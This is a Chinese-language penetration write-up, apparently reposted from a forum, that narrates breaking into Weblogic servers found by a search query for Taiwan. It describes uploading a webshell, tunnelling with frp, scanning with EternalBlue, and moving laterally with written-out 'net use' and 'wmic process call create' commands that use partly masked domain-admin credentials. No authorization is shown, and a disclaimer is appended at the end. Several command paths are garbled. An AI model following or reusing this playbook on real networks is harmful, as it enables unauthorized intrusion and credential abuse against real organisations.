前言
渗透开始
语句:body="10.4.5 404 Not Found" && country="CN" && region="TW"
Weblogic 404页面 因为是java站直接用工具测测 已经爆出的漏洞
但是目前不知道路径 所以需要找路径
先dirsearch一波
上传一个txt试试能不能访问
能成功访问到 然后直接上冰蝎马
先看看能不能出网
讲frp配置好 讲serve端传上去
毕竟流量弄到本地来整好操作
然后在上传一个测试文件
访问他的内网ip的资产,代理成功
接着探测到存在122,123网段
先直接用永恒之蓝工具盲打一波
好的,工具人上线,永恒之蓝扫一遍
192.168.122.29
192.168.122.217
192.168.123.84
192.168.123.103
192.168.123.209
这里执行的时候需要注意给引号转义
执行之后
这里直接上线了一台:192.168.122.217
既然他们是在同一个域,那么设置的策略都是相同的,所以可以通过域管理员账号登录192.168.123.219这台机器,所以现在咱们要整一个域管理员的账号密码
用命令开启共享连接:
shell net use 192.168.123.219ipc$ "ay*****" /user:"ty*****steve"
shell wmic /node:192.168.123.219 /user:ty****steve /password:ay2**** process call create "cmd.exe /c C:WindowsTempmac.exe"
其中的tyt*****y.com.tw已经被拿下,所以考虑另外一个域
查看ty****n.com.tw的ip
这里用steve的账号密码去登录了192.168.123.2 的smb,所以steve也是上面的域管
shell net use 192.168.123.2ipc$ "ay***" /user:"ty***ysteve"
shell copy c:windowstemphex.jpg 192.1618.123.2c$windowstempak.exe
shell wmic /node:192.168.123.2 /user:tyysteve /password:ay9 process call create "cmd.exe /c C:WindowsTempak.exe"
查看下123.2 的sysinfo
利用wmic 执行命令输出到文件 然后查看
放到在线杀软查询 发现有一个微软的杀软
成功上线
后续的权限维持不太会 就没有操作了
删马结束
over
最后
msf的流量代理也是 只能带17010打的时候的流量 就有点懵
师傅们轻点喷 ~ 师傅们指点
文章来源: https://forum.butian.net/share/586文章作者:永安寺如有侵权请您联系我们,我们会进行删除并致
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论